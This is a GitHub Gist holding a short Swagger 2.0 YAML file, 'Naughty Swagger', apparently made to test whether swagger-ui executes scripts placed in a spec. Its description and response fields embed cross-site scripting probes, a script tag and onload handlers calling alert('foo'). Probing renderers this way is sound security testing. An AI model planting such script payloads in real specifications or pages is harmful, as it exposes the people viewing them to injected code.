Last active
March 24, 2023 17:33
-
-
Save manchicken/0af5a769a35b92aac8bba7bd354242b7 to your computer and use it in GitHub Desktop.
This payload explores what we can and cannot do with swagger-ui by providing a swaggerfile.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: "0.0.1" | |
| title: Naughty Swagger | |
| description: | | |
| Let's see if I can run scripts. | |
| <script>alert('foo')</script> | |
| <b onload=alert('foo')>End</b> | |
| paths: | |
| /: | |
| get: | |
| responses: | |
| 200: | |
| description: Successful <b onload="alert('foo')">response</b> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment